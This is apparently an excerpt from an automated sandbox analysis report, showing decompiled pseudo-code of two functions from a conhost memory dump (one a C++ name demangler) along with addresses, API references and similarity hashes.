			E00007FF67FF67EEC33E0(void* __eax, long long __rcx, long long __rdx, long long __r9, intOrPtr _a40) {
				intOrPtr _v64;
				long long _v72;
				long long _v80;
				char _v88;
				long long _v96;
				short _v102;
				short _v104;
				long long _v112;
				short _v118;
				char _v120;
				char _v128;
				char _v132;
				long long _v152;
				long long _v160;
				long long _v168;
				signed int _t32;

				_v118 = 0x209;
				0x7eed66e8();
				r9d = 0;
				_v160 = 0;
				_v168 = 0;
				asm("pxor xmm0, xmm0");
				_v120 = __eax + __eax;
				_v72 =  &_v120;
				_v152 =  &_v132;
				_v112 = __rcx;
				_v88 = 0x30;
				_v80 = 0;
				_v64 = 0x40;
				asm("movaps [esp+0x90], xmm0");
				_v132 = 0;
				_v128 = 0;
				if (E00007FF67FF67EEC40F4(0x20006,  &_v132,  &_v128,  &_v88) < 0) goto 0x7eec34da;
				_v102 = 0x209;
				0x7eed66e8();
				r9d = r8d;
				r8d = 0;
				_v168 = __r9;
				_v104 = 0x412;
				_v96 = __rdx;
				_v160 = _a40;
				_t32 = E00007FF67FF67EEC4130(0x20006,  &_v132, _v128,  &_v88);
				E00007FF67FF67EEC3FEF(0x20006,  &_v132, _v128,  &_v88);
				return  !_t32 >> 0x1f;
			}

0x7ff67eec33fc
0x7ff67eec3401
0x7ff67eec3406
0x7ff67eec340e
0x7ff67eec341d
0x7ff67eec3426
0x7ff67eec342a
0x7ff67eec3434
0x7ff67eec3441
0x7ff67eec344b
0x7ff67eec3452
0x7ff67eec345a
0x7ff67eec3463
0x7ff67eec346e
0x7ff67eec3476
0x7ff67eec347e
0x7ff67eec348e
0x7ff67eec3498
0x7ff67eec349d
0x7ff67eec34a7
0x7ff67eec34aa
0x7ff67eec34b4
0x7ff67eec34b9
0x7ff67eec34c5
0x7ff67eec34ca
0x7ff67eec34ce
0x7ff67eec34df
0x7ff67eec34f1

APIs

wcslen.MSVCRT ref: 00007FF67EEC3401
wcslen.MSVCRT ref: 00007FF67EEC349D

Strings

@, xrefs: 00007FF67EEC3463
0, xrefs: 00007FF67EEC3452

Memory Dump Source

Source File: 0000002E.00000002.673932582.00007FF67EEC1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF67EEC0000, based on PE: true

Associated: 0000002E.00000002.673912172.00007FF67EEC0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002E.00000002.673961351.00007FF67EEDB000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002E.00000002.673974591.00007FF67EEDD000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002E.00000002.673993039.00007FF67EEE4000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002E.00000002.673993039.00007FF67EEE6000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002E.00000002.674025341.00007FF67EEE9000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_7ff67eec0000_conhost.jbxd

Similarity

API ID: wcslen
String ID: 0$@
API String ID: 4088430540-1545510068
Opcode ID: 19d858f3a31da7487df7df7cecf98c0208d6a3dfc4290e44c705195194a003ce
Instruction ID: c1ef8c9cbfad61a19bda9719ae13f873173fb2de47a863b6546eab3b263b4ad4
Opcode Fuzzy Hash: 19d858f3a31da7487df7df7cecf98c0208d6a3dfc4290e44c705195194a003ce
Instruction Fuzzy Hash: 39213B3362878086E3209B65F44579BBAA4FBD4394F604235FB8887B5AEF7DD049CB00

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF67EEC8695 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 63
stringCOMMON

Download Yara Rule

C-Code - Quality: 60%

			E00007FF67FF67EEC8695() {
				intOrPtr _t744;
				void* _t770;
				void* _t791;
				signed int _t825;
				intOrPtr _t827;
				signed int _t851;
				void* _t881;
				intOrPtr _t895;
				signed int _t897;
				signed int _t1070;
				signed int _t1079;
				intOrPtr _t1080;
				short _t1154;
				void* _t1270;
				void* _t1290;
				intOrPtr _t1308;
				long long _t1309;
				intOrPtr _t1310;
				long long _t1311;
				intOrPtr _t1312;
				long long _t1313;
				intOrPtr* _t1314;
				intOrPtr _t1315;
				long long _t1316;
				intOrPtr _t1317;
				long long _t1318;
				intOrPtr _t1319;
				long long _t1320;
				intOrPtr _t1321;
				long long _t1322;
				intOrPtr _t1323;
				long long _t1324;
				intOrPtr _t1325;
				long long _t1326;
				intOrPtr _t1327;
				long long _t1328;
				intOrPtr* _t1336;
				intOrPtr _t1337;
				intOrPtr _t1339;
				long long _t1340;
				intOrPtr _t1341;
				long long _t1342;
				intOrPtr _t1344;
				intOrPtr _t1345;
				intOrPtr _t1346;
				intOrPtr _t1347;
				long long _t1348;
				intOrPtr _t1349;
				long long _t1350;
				intOrPtr _t1351;
				long long _t1352;
				intOrPtr _t1353;
				long long _t1354;
				intOrPtr _t1355;
				long long _t1356;
				intOrPtr _t1357;
				long long _t1358;
				intOrPtr _t1359;
				long long _t1360;
				intOrPtr _t1361;
				intOrPtr _t1362;
				intOrPtr* _t1363;
				intOrPtr _t1368;
				long long _t1369;
				intOrPtr _t1370;
				long long _t1371;
				intOrPtr _t1372;
				intOrPtr _t1373;
				intOrPtr _t1374;
				long long _t1375;
				intOrPtr _t1376;
				long long _t1377;
				intOrPtr _t1378;
				long long _t1379;
				intOrPtr _t1380;
				long long _t1381;
				intOrPtr _t1382;
				long long _t1383;
				intOrPtr _t1387;
				signed long long _t1389;
				signed long long _t1390;
				intOrPtr _t1392;
				signed long long _t1393;
				intOrPtr* _t1394;
				intOrPtr _t1395;
				signed long long _t1396;
				signed long long _t1397;
				signed long long _t1400;
				signed long long _t1401;
				signed long long _t1402;
				signed long long _t1403;
				signed long long _t1405;
				signed long long _t1406;
				signed long long _t1410;
				signed long long _t1411;
				signed long long _t1413;
				intOrPtr* _t1416;
				signed char* _t1417;
				signed long long _t1419;
				signed long long _t1423;
				signed long long _t1425;
				intOrPtr* _t1426;
				signed long long _t1427;
				signed long long _t1428;
				signed long long _t1429;
				signed long long _t1430;
				long long _t1432;
				void* _t1433;
				intOrPtr _t1437;
				intOrPtr* _t1438;
				void* _t1442;
				void* _t1443;
				void* _t1445;
				void* _t1446;
				void* _t1447;
				signed long long _t1448;
				void* _t1449;
				void* _t1450;
				void* _t1451;
				void* _t1454;
				void* _t1455;
				void* _t1456;
				void* _t1457;
				void* _t1458;
				void* _t1459;
				void* _t1470;
				void* _t1471;
				void* _t1473;
				void* _t1474;
				void* _t1475;
				void* _t1476;
				void* _t1477;
				void* _t1478;
				void* _t1479;
				void* _t1480;
				void* _t1481;
				void* _t1488;
				void* _t1489;
				void* _t1490;
				void* _t1491;
				void* _t1492;
				void* _t1493;
				void* _t1494;
				void* _t1495;
				void* _t1496;
				void* _t1498;
				void* _t1499;
				void* _t1501;
				void* _t1502;
				void* _t1504;
				void* _t1520;
				void* _t1521;
				signed long long _t1548;
				long long _t1561;
				void* _t1562;
				signed long long _t1611;
				signed long long _t1612;
				signed long long _t1622;
				signed long long _t1623;
				signed long long _t1625;
				signed long long _t1626;
				signed long long _t1631;
				signed long long _t1632;
				signed long long _t1634;
				signed long long _t1635;
				char* _t1647;
				intOrPtr _t1652;
				intOrPtr* _t1653;
				char* _t1717;
				void* _t1719;
				void* _t1720;
				signed long long _t1721;
				intOrPtr _t1722;
				void* _t1723;
				long long _t1724;
				signed char* _t1728;
				void* _t1732;
				char* _t1734;
				void* _t1737;
				intOrPtr _t1740;
				intOrPtr _t1742;
				void* _t1743;
				void* _t1746;
				signed char* _t1747;
				void* _t1748;
				intOrPtr* _t1753;
				void* _t1754;
				void* _t1755;
				signed char* _t1756;
				long long _t1766;
				intOrPtr _t1769;
				intOrPtr _t1771;
				void* _t1772;
				void* _t1773;
				signed char* _t1779;
				signed char* _t1780;
				signed char _t1781;
				void* _t1782;
				void* _t1783;
				void* _t1785;
				void* _t1786;
				void* _t1787;
				void* _t1789;
				intOrPtr _t1791;
				intOrPtr _t1793;
				intOrPtr _t1801;
				intOrPtr _t1806;
				long long _t1812;
				intOrPtr _t1821;
				intOrPtr _t1823;
				intOrPtr _t1829;
				intOrPtr _t1845;
				intOrPtr _t1846;
				intOrPtr* _t1867;
				signed char _t1893;
				long long _t1902;
				intOrPtr _t1903;
				signed long long _t1936;
				void* _t1938;
				signed long long _t1939;

				if ( *((intOrPtr*)(_t1789 + 0x10)) != 0) goto 0x7eeca0f3;
				_t1449 = _t1442;
				_t1783 = _t1782 + 0xb8;
				_pop(_t1443);
				r8d =  *(_t1449 + 0x138);
				if (r8d == 0) goto 0x7eeca0a0;
				_t1308 =  *((intOrPtr*)(_t1449 + 0x100));
				goto 0x7eec8716;
				asm("o16 nop [eax+eax]");
				_t1309 = _t1308 + 1;
				 *((long long*)(_t1443 + 0x100)) = _t1309;
				 *((intOrPtr*)(_t1443 + _t1308)) = bpl;
				 *((intOrPtr*)(_t1443 + 0x108)) = bpl;
				if ("auto:" + 5 == "auto:" + 1) goto 0x7eeca1b2;
				if (_t1309 != 0xff) goto 0x7eec86f0;
				 *((char*)(_t1443 + 0xff)) = 0;
				_t1450 = _t1443;
				 *((intOrPtr*)(_t1443 + 0x110))();
				 *((intOrPtr*)(_t1443 + 0x140)) =  *((intOrPtr*)(_t1443 + 0x140)) + 1;
				_t1310 =  *((intOrPtr*)(_t1450 + 0x100));
				goto 0x7eec878e;
				_t1311 = _t1310 + 1;
				 *((long long*)(_t1443 + 0x100)) = _t1311;
				 *((intOrPtr*)(_t1443 + _t1310)) = bpl;
				 *((intOrPtr*)(_t1443 + 0x108)) = bpl;
				if ("typeinfo for " + 0xd == "typeinfo for " + 1) goto 0x7eec7e88;
				if (_t1311 != 0xff) goto 0x7eec8768;
				_t1791 =  *((intOrPtr*)(_t1443 + 0x118));
				 *((char*)(_t1443 + 0xff)) = 0;
				_t1451 = _t1443;
				 *((intOrPtr*)(_t1443 + 0x110))();
				 *((intOrPtr*)(_t1443 + 0x140)) =  *((intOrPtr*)(_t1443 + 0x140)) + 1;
				E00007FF67FF67EECAF30(_t1451,  *((intOrPtr*)(_t1791 + 0x10)));
				_t1312 =  *((intOrPtr*)(_t1443 + 0x100));
				goto 0x7eec8816;
				asm("o16 nop [eax+eax]");
				_t1313 = _t1312 + 1;
				 *((long long*)(_t1443 + 0x100)) = _t1313;
				 *((intOrPtr*)(_t1443 + _t1312)) = bpl;
				 *((intOrPtr*)(_t1443 + 0x108)) = bpl;
				if (0x7eede35f == 0x7ff67eede364) goto 0x7eec9af0;
				_t1079 =  *0x7FF67EEDE360 & 0x000000ff;
				if (_t1313 != 0xff) goto 0x7eec87f0;
				_t1793 =  *((intOrPtr*)(_t1443 + 0x118));
				 *((char*)(_t1443 + 0xff)) = 0;
				 *((intOrPtr*)(_t1443 + 0x110))();
				 *((intOrPtr*)(_t1443 + 0x140)) =  *((intOrPtr*)(_t1443 + 0x140)) + 1;
				r12d = 0;
				E00007FF67FF67EEC48D0();
				if (_t1313 != 0) goto 0x7eec8884;
				goto 0x7eecaae2;
				asm("o16 nop [cs:eax+eax]");
				if ( *((long long*)(_t1313 + 0x10)) == 0) goto 0x7eec8889;
				_t1314 =  *((intOrPtr*)(_t1313 + 0x18));
				r12d = r12d + 1;
				if (_t1314 == 0) goto 0x7eec8892;
				if ( *_t1314 == 0x2f) goto 0x7eec8870;
				if (r12d == 0) goto 0x7eec7e2a;
				r14d = 0x7ff67eede363;
				goto 0x7eec88ac;
				_t1080 = _t1079 + 1;
				if (r12d == _t1080) goto 0x7eec7e2a;
				 *((intOrPtr*)(_t1443 + 0x13c)) = _t1080;
				E00007FF67FF67EECAF30(_t1443,  *((intOrPtr*)(_t1793 + 0x10)));
				if (_t1080 - r14d >= 0) goto 0x7eec88a0;
				_t1315 =  *((intOrPtr*)(_t1443 + 0x100));
				goto 0x7eec8902;
				asm("o16 nop [eax+eax]");
				_t1316 = _t1315 + 1;
				_t1728 = ", " + 1;
				 *((long long*)(_t1443 + 0x100)) = _t1316;
				 *((intOrPtr*)(_t1443 + _t1315)) = r15b;
				 *((intOrPtr*)(_t1443 + 0x108)) = r15b;
				if (0x7eede512 == _t1728) goto 0x7eec88a0;
				r15d =  *_t1728 & 0x000000ff;
				if (_t1316 != 0xff) goto 0x7eec88e0;
				 *((char*)(_t1443 + 0xff)) = 0;
				_t1454 = _t1443;
				 *((intOrPtr*)(_t1443 + 0x110))();
				 *((intOrPtr*)(_t1443 + 0x140)) =  *((intOrPtr*)(_t1443 + 0x140)) + 1;
				_t1317 =  *((intOrPtr*)(_t1454 + 0x100));
				goto 0x7eec8976;
				_t1318 = _t1317 + 1;
				 *((long long*)(_t1443 + 0x100)) = _t1318;
				 *((intOrPtr*)(_t1443 + _t1317)) = bpl;
				 *((intOrPtr*)(_t1443 + 0x108)) = bpl;
				if ("non-transaction clone for " + 1 == "non-transaction clone for " + 0x1a) goto 0x7eec7e88;
				if (_t1318 != 0xff) goto 0x7eec8950;
				 *((char*)(_t1443 + 0xff)) = 0;
				_t1455 = _t1443;
				 *((intOrPtr*)(_t1443 + 0x110))();
				 *((intOrPtr*)(_t1443 + 0x140)) =  *((intOrPtr*)(_t1443 + 0x140)) + 1;
				_t1319 =  *((intOrPtr*)(_t1455 + 0x100));
				goto 0x7eec89ee;
				_t1320 = _t1319 + 1;
				 *((long long*)(_t1443 + 0x100)) = _t1320;
				 *((intOrPtr*)(_t1443 + _t1319)) = bpl;
				 *((intOrPtr*)(_t1443 + 0x108)) = bpl;
				if ("transaction clone for " + 1 == "transaction clone for " + 0x16) goto 0x7eec7e88;
				if (_t1320 != 0xff) goto 0x7eec89c8;
				 *((char*)(_t1443 + 0xff)) = 0;
				_t1456 = _t1443;
				 *((intOrPtr*)(_t1443 + 0x110))();
				 *((intOrPtr*)(_t1443 + 0x140)) =  *((intOrPtr*)(_t1443 + 0x140)) + 1;
				_t1321 =  *((intOrPtr*)(_t1456 + 0x100));
				goto 0x7eec8a66;
				_t1322 = _t1321 + 1;
				 *((long long*)(_t1443 + 0x100)) = _t1322;
				 *((intOrPtr*)(_t1443 + _t1321)) = bpl;
				 *((intOrPtr*)(_t1443 + 0x108)) = bpl;
				if ("{unnamed type#" + 0xe == "{unnamed type#" + 1) goto 0x7eec9ed8;
				if (_t1322 != 0xff) goto 0x7eec8a40;
				 *((char*)(_t1443 + 0xff)) = 0;
				_t1457 = _t1443;
				 *((intOrPtr*)(_t1443 + 0x110))();
				 *((intOrPtr*)(_t1443 + 0x140)) =  *((intOrPtr*)(_t1443 + 0x140)) + 1;
				_t1323 =  *((intOrPtr*)(_t1457 + 0x100));
				goto 0x7eec8ade;
				_t1324 = _t1323 + 1;
				 *((long long*)(_t1443 + 0x100)) = _t1324;
				 *((intOrPtr*)(_t1443 + _t1323)) = bpl;
				 *((intOrPtr*)(_t1443 + 0x108)) = bpl;
				if ("{lambda(" + 8 == "{lambda(" + 1) goto 0x7eec9d8d;
				if (_t1324 != 0xff) goto 0x7eec8ab8;
				 *((char*)(_t1443 + 0xff)) = 0;
				_t1458 = _t1443;
				 *((intOrPtr*)(_t1443 + 0x110))();
				 *((intOrPtr*)(_t1443 + 0x140)) =  *((intOrPtr*)(_t1443 + 0x140)) + 1;
				_t1325 =  *((intOrPtr*)(_t1458 + 0x100));
				goto 0x7eec8b56;
				_t1326 = _t1325 + 1;
				 *((long long*)(_t1443 + 0x100)) = _t1326;
				 *((intOrPtr*)(_t1443 + _t1325)) = bpl;
				 *((intOrPtr*)(_t1443 + 0x108)) = bpl;
				if ("global destructors keyed to " + 1 == "global destructors keyed to " + 0x1c) goto 0x7eec7e88;
				if (_t1326 != 0xff) goto 0x7eec8b30;
				 *((char*)(_t1443 + 0xff)) = 0;
				_t1459 = _t1443;
				 *((intOrPtr*)(_t1443 + 0x110))();
				 *((intOrPtr*)(_t1443 + 0x140)) =  *((intOrPtr*)(_t1443 + 0x140)) + 1;
				_t1327 =  *((intOrPtr*)(_t1459 + 0x100));
				goto 0x7eec8bce;
				_t1328 = _t1327 + 1;
				 *((long long*)(_t1443 + 0x100)) = _t1328;
				 *((intOrPtr*)(_t1443 + _t1327)) = bpl;
				 *((intOrPtr*)(_t1443 + 0x108)) = bpl;
				if ("global constructors keyed to " + 1 == "global constructors keyed to " + 0x1d) goto 0x7eec7e88;
				if (_t1328 != 0xff) goto 0x7eec8ba8;
				_t1801 =  *((intOrPtr*)(_t1443 + 0x118));
				 *((char*)(_t1443 + 0xff)) = 0;
				 *((intOrPtr*)(_t1443 + 0x110))();
				 *((intOrPtr*)(_t1443 + 0x140)) =  *((intOrPtr*)(_t1443 + 0x140)) + 1;
				if ( *((intOrPtr*)( *((intOrPtr*)(_t1801 + 0x18)))) != 0x39) goto 0x7eec7e20;
				if ( *((char*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t1801 + 0x10)) + 0x10)))) + 1)) == 0x63) goto 0x7eecaa40;
				if (E00007FF67FF67EECCA80(_t1443, _t1728) != 0) goto 0x7eec7e2a;
				if (E00007FF67FF67EECCE10(_t1443, _t1728) != 0) goto 0x7eec7e2a;
				if ( *(_t1728[0x10]) == 0x32) goto 0x7eecad75;
				if (strcmp(??, ??) != 0) goto 0x7eec8c90;
				if ( *((intOrPtr*)( *((intOrPtr*)(_t1728[0x18] + 0x10)))) == 3) goto 0x7eecae4c;
				E00007FF67FF67EECC8D0(_t1443,  *((intOrPtr*)(_t1728[0x18] + 0x10)));
				if (strcmp(??, ??) == 0) goto 0x7eecad41;
				if (strcmp(??, ??) != 0) goto 0x7eecaee7;
				_t1806 =  *((intOrPtr*)(_t1728[0x18] + 0x18));
				E00007FF67FF67EECC8D0(_t1443, _t1806);
				_t1336 = _t1728[0x10];
				if ( *_t1336 != 0x32) goto 0x7eec7e2a;
				_t1337 =  *((intOrPtr*)(_t1336 + 0x10));
				if ( *((intOrPtr*)(_t1337 + 0x10)) != 1) goto 0x7eec7e2a;
				if ( *((char*)( *((intOrPtr*)(_t1337 + 8)))) != 0x3e) goto 0x7eec7e2a;
				goto E00007FF67FF67EEC4760;
				_t744 =  *((intOrPtr*)( *((intOrPtr*)(_t1806 + 0x10))));
				if (_t744 == 0x32) goto 0x7eeca3c6;
				if (_t744 == 0x34) goto 0x7eeca503;
				E00007FF67FF67EECC230(_t1443,  *((intOrPtr*)(_t1806 + 0x10)));
				_t1785 = _t1783 + 0x170;
				_pop(_t1445);
				_t1470 = _t1445;
				_t1786 = _t1785 + 0xb8;
				_pop(_t1446);
				_pop(_t1732);
				_t1339 =  *((intOrPtr*)(_t1470 + 0x100));
				goto 0x7eec8dde;
				_t1340 = _t1339 + 1;
				 *((long long*)(_t1446 + 0x100)) = _t1340;
				 *((intOrPtr*)(_t1446 + _t1339)) = bpl;
				 *((intOrPtr*)(_t1446 + 0x108)) = bpl;
				if ("template parameter object for " + 1 == "template parameter object for " + 0x1e) goto 0x7eec7e88;
				if (_t1340 != 0xff) goto 0x7eec8db8;
				 *((char*)(_t1446 + 0xff)) = 0;
				_t1471 = _t1446;
				 *((intOrPtr*)(_t1446 + 0x110))();
				 *((intOrPtr*)(_t1446 + 0x140)) =  *((intOrPtr*)(_t1446 + 0x140)) + 1;
				_t1341 =  *((intOrPtr*)(_t1471 + 0x100));
				goto 0x7eec8e56;
				_t1342 = _t1341 + 1;
				 *((long long*)(_t1446 + 0x100)) = _t1342;
				 *((intOrPtr*)(_t1446 + _t1341)) = bpl;
				 *((intOrPtr*)(_t1446 + 0x108)) = bpl;
				if ("reference temporary #" + 1 == "reference temporary #" + 0x15) goto 0x7eec9b78;
				if (_t1342 != 0xff) goto 0x7eec8e30;
				 *((char*)(_t1446 + 0xff)) = 0;
				 *((intOrPtr*)(_t1446 + 0x110))();
				 *((intOrPtr*)(_t1446 + 0x140)) =  *((intOrPtr*)(_t1446 + 0x140)) + 1;
				goto 0x7eec8e37;
				_t1154 =  *((short*)( *((intOrPtr*)(_t1446 + 0x118)) + 0x1a));
				asm("sbb al, [eax]");
				if (_t1154 != 0) goto 0x7eeca4dd;
				_t1812 =  *((intOrPtr*)(_t1732 + 0x10));
				if ( *((intOrPtr*)(_t1812 + 0x10)) == 0x7eedf6e0) goto 0x7eec8ee0;
				_t1473 = _t1446;
				E00007FF67FF67EECAF30(_t1473, _t1812);
				_t1344 =  *((intOrPtr*)(_t1446 + 0x100));
				if (_t1344 == 0xff) goto 0x7eecab23;
				 *((long long*)(_t1446 + 0x100)) = _t1344 + 1;
				 *((char*)(_t1446 + _t1344)) = 0x20;
				 *((char*)(_t1446 + 0x108)) = 0x20;
				if ( *((short*)(_t1732 + 0x18)) != 0) goto 0x7eec86a8;
				 *((long long*)(_t1446 + 0x170)) = _t1812;
				 *((long long*)(_t1473 + 0x128)) = 0;
				E00007FF67FF67EECAF30(_t1473,  *((intOrPtr*)(_t1812 + 0x10)));
				if ( *((char*)(_t1446 + 0x108)) == 0x3c) goto 0x7eeca7cf;
				_t1345 =  *((intOrPtr*)(_t1446 + 0x100));
				if (_t1345 == 0xff) goto 0x7eeca7a0;
				 *((long long*)(_t1446 + 0x100)) = _t1345 + 1;
				_t1474 = _t1446;
				 *((char*)(_t1446 + _t1345)) = 0x3c;
				 *((char*)(_t1446 + 0x108)) = 0x3c;
				E00007FF67FF67EECAF30(_t1474,  *((intOrPtr*)(_t1732 + 0x18)));
				if ( *((char*)(_t1446 + 0x108)) == 0x3e) goto 0x7eeca78e;
				_t1346 =  *((intOrPtr*)(_t1446 + 0x100));
				if (_t1346 == 0xff) goto 0x7eeca75f;
				 *((long long*)(_t1446 + 0x100)) = _t1346 + 1;
				 *((char*)(_t1446 + _t1346)) = 0x3e;
				 *((char*)(_t1446 + 0x108)) = 0x3e;
				 *((long long*)(_t1446 + 0x128)) =  *((intOrPtr*)(_t1473 + 0x128));
				 *((long long*)(_t1446 + 0x170)) =  *((intOrPtr*)(_t1473 + 0x170));
				_t1347 =  *((intOrPtr*)(_t1474 + 0x100));
				goto 0x7eec8ff6;
				_t1348 = _t1347 + 1;
				 *((long long*)(_t1446 + 0x100)) = _t1348;
				 *((intOrPtr*)(_t1446 + _t1347)) = bpl;
				 *((intOrPtr*)(_t1446 + 0x108)) = bpl;
				if ("guard variable for " + 1 == "guard variable for " + 0x13) goto 0x7eec7e88;
				if (_t1348 != 0xff) goto 0x7eec8fd0;
				 *((char*)(_t1446 + 0xff)) = 0;
				_t1475 = _t1446;
				 *((intOrPtr*)(_t1446 + 0x110))();
				 *((intOrPtr*)(_t1446 + 0x140)) =  *((intOrPtr*)(_t1446 + 0x140)) + 1;
				_t1349 =  *((intOrPtr*)(_t1475 + 0x100));
				goto 0x7eec906e;
				_t1350 = _t1349 + 1;
				 *((long long*)(_t1446 + 0x100)) = _t1350;
				 *((intOrPtr*)(_t1446 + _t1349)) = bpl;
				 *((intOrPtr*)(_t1446 + 0x108)) = bpl;
				if ("java Class for " + 1 == "java Class for " + 0xf) goto 0x7eec7e88;
				if (_t1350 != 0xff) goto 0x7eec9048;
				 *((char*)(_t1446 + 0xff)) = 0;
				_t1476 = _t1446;
				 *((intOrPtr*)(_t1446 + 0x110))();
				 *((intOrPtr*)(_t1446 + 0x140)) =  *((intOrPtr*)(_t1446 + 0x140)) + 1;
				_t1351 =  *((intOrPtr*)(_t1476 + 0x100));
				goto 0x7eec90e6;
				_t1352 = _t1351 + 1;
				 *((long long*)(_t1446 + 0x100)) = _t1352;
				 *((intOrPtr*)(_t1446 + _t1351)) = bpl;
				 *((intOrPtr*)(_t1446 + 0x108)) = bpl;
				if ("covariant return thunk to " + 0x1a == "covariant return thunk to " + 1) goto 0x7eec7e88;
				if (_t1352 != 0xff) goto 0x7eec90c0;
				 *((char*)(_t1446 + 0xff)) = 0;
				_t1477 = _t1446;
				 *((intOrPtr*)(_t1446 + 0x110))();
				 *((intOrPtr*)(_t1446 + 0x140)) =  *((intOrPtr*)(_t1446 + 0x140)) + 1;
				_t1353 =  *((intOrPtr*)(_t1477 + 0x100));
				goto 0x7eec915e;
				_t1354 = _t1353 + 1;
				 *((long long*)(_t1446 + 0x100)) = _t1354;
				 *((intOrPtr*)(_t1446 + _t1353)) = bpl;
				 *((intOrPtr*)(_t1446 + 0x108)) = bpl;
				if ("virtual thunk to " + 0x11 == "virtual thunk to " + 1) goto 0x7eec7e88;
				if (_t1354 != 0xff) goto 0x7eec9138;
				 *((char*)(_t1446 + 0xff)) = 0;
				_t1478 = _t1446;
				 *((intOrPtr*)(_t1446 + 0x110))();
				 *((intOrPtr*)(_t1446 + 0x140)) =  *((intOrPtr*)(_t1446 + 0x140)) + 1;
				_t1355 =  *((intOrPtr*)(_t1478 + 0x100));
				goto 0x7eec91d6;
				_t1356 = _t1355 + 1;
				 *((long long*)(_t1446 + 0x100)) = _t1356;
				 *((intOrPtr*)(_t1446 + _t1355)) = bpl;
				 *((intOrPtr*)(_t1446 + 0x108)) = bpl;
				if ("operator " + 9 == "operator " + 1) goto 0x7eec9d25;
				if (_t1356 != 0xff) goto 0x7eec91b0;
				 *((char*)(_t1446 + 0xff)) = 0;
				_t1479 = _t1446;
				 *((intOrPtr*)(_t1446 + 0x110))();
				 *((intOrPtr*)(_t1446 + 0x140)) =  *((intOrPtr*)(_t1446 + 0x140)) + 1;
				_t1357 =  *((intOrPtr*)(_t1479 + 0x100));
				goto 0x7eec924e;
				_t1358 = _t1357 + 1;
				 *((long long*)(_t1446 + 0x100)) = _t1358;
				 *((intOrPtr*)(_t1446 + _t1357)) = bpl;
				 *((intOrPtr*)(_t1446 + 0x108)) = bpl;
				if ("TLS wrapper function for " + 0x19 == "TLS wrapper function for " + 1) goto 0x7eec7e88;
				if (_t1358 != 0xff) goto 0x7eec9228;
				 *((char*)(_t1446 + 0xff)) = 0;
				_t1480 = _t1446;
				 *((intOrPtr*)(_t1446 + 0x110))();
				 *((intOrPtr*)(_t1446 + 0x140)) =  *((intOrPtr*)(_t1446 + 0x140)) + 1;
				_t1359 =  *((intOrPtr*)(_t1480 + 0x100));
				goto 0x7eec92c6;
				_t1360 = _t1359 + 1;
				 *((long long*)(_t1446 + 0x100)) = _t1360;
				 *((intOrPtr*)(_t1446 + _t1359)) = bpl;
				 *((intOrPtr*)(_t1446 + 0x108)) = bpl;
				if ("TLS init function for " + 0x16 == "TLS init function for " + 1) goto 0x7eec7e88;
				if (_t1360 != 0xff) goto 0x7eec92a0;
				_t1821 =  *((intOrPtr*)(_t1446 + 0x118));
				 *((char*)(_t1446 + 0xff)) = 0;
				_t1481 = _t1446;
				 *((intOrPtr*)(_t1446 + 0x110))();
				 *((intOrPtr*)(_t1446 + 0x140)) =  *((intOrPtr*)(_t1446 + 0x140)) + 1;
				E00007FF67FF67EECAF30(_t1481,  *((intOrPtr*)(_t1821 + 0x10)));
				_t1361 =  *((intOrPtr*)(_t1446 + 0x100));
				if (_t1361 == 0xff) goto 0x7eeca59b;
				 *((long long*)(_t1446 + 0x100)) = _t1361 + 1;
				 *((char*)(_t1446 + _t1361)) = 0x28;
				 *((char*)(_t1446 + 0x108)) = 0x28;
				_t1823 =  *((intOrPtr*)(_t1732 + 0x18));
				E00007FF67FF67EECAF30(_t1446, _t1823);
				_t1362 =  *((intOrPtr*)(_t1446 + 0x100));
				if (_t1362 == 0xff) goto 0x7eeca255;
				 *((long long*)(_t1446 + 0x100)) = _t1362 + 1;
				 *((char*)(_t1446 + _t1362)) = 0x29;
				 *((char*)(_t1446 + 0x108)) = 0x29;
				goto 0x7eec7e2a;
				_t1363 =  *((intOrPtr*)(_t1823 + 0x18));
				if ( *_t1363 != 0x3b) goto 0x7eec7e20;
				if ( *((intOrPtr*)( *((intOrPtr*)(_t1363 + 0x18)))) != 0x3c) goto 0x7eec7e20;
				if (E00007FF67FF67EECCA80(_t1446, _t1823) != 0) goto 0x7eec7e2a;
				_t770 = E00007FF67FF67EECCE10(_t1446, _t1732);
				if (_t770 != 0) goto 0x7eec7e2a;
				0x7eed66b0();
				if (_t770 != 0) goto 0x7eecae96;
				E00007FF67FF67EECC8D0(_t1446,  *((intOrPtr*)( *((intOrPtr*)(_t1732 + 0x18)) + 0x10)));
				E00007FF67FF67EECC230(_t1446,  *((intOrPtr*)(_t1732 + 0x10)));
				E00007FF67FF67EECC8D0(_t1446,  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t1732 + 0x18)) + 0x18)) + 0x10)));
				_t1488 = _t1446;
				E00007FF67FF67EEC4830( *((intOrPtr*)( *((intOrPtr*)(_t1732 + 0x10)) + 0x10)), _t1488, " : ");
				_t1368 =  *((intOrPtr*)(_t1488 + 0x100));
				goto 0x7eec946e;
				_t1369 = _t1368 + 1;
				 *((long long*)(_t1446 + 0x100)) = _t1369;
				 *((intOrPtr*)(_t1446 + _t1368)) = bpl;
				 *((intOrPtr*)(_t1446 + 0x108)) = bpl;
				if ("java resource " + 1 == "java resource " + 0xe) goto 0x7eec7e88;
				if (_t1369 != 0xff) goto 0x7eec9448;
				 *((char*)(_t1446 + 0xff)) = 0;
				_t1489 = _t1446;
				 *((intOrPtr*)(_t1446 + 0x110))();
				 *((intOrPtr*)(_t1446 + 0x140)) =  *((intOrPtr*)(_t1446 + 0x140)) + 1;
				_t1734 = "operator";
				_t1370 =  *((intOrPtr*)(_t1489 + 0x100));
				goto 0x7eec94ee;
				asm("o16 nop [eax+eax]");
				_t1371 = _t1370 + 1;
				_t1735 = _t1734 + 1;
				 *((long long*)(_t1446 + 0x100)) = _t1371;
				 *((intOrPtr*)(_t1446 + _t1370)) = dil;
				 *((intOrPtr*)(_t1446 + 0x108)) = dil;
				if (_t1734 + 8 == _t1734 + 1) goto 0x7eec9c8e;
				if (_t1371 != 0xff) goto 0x7eec94c8;
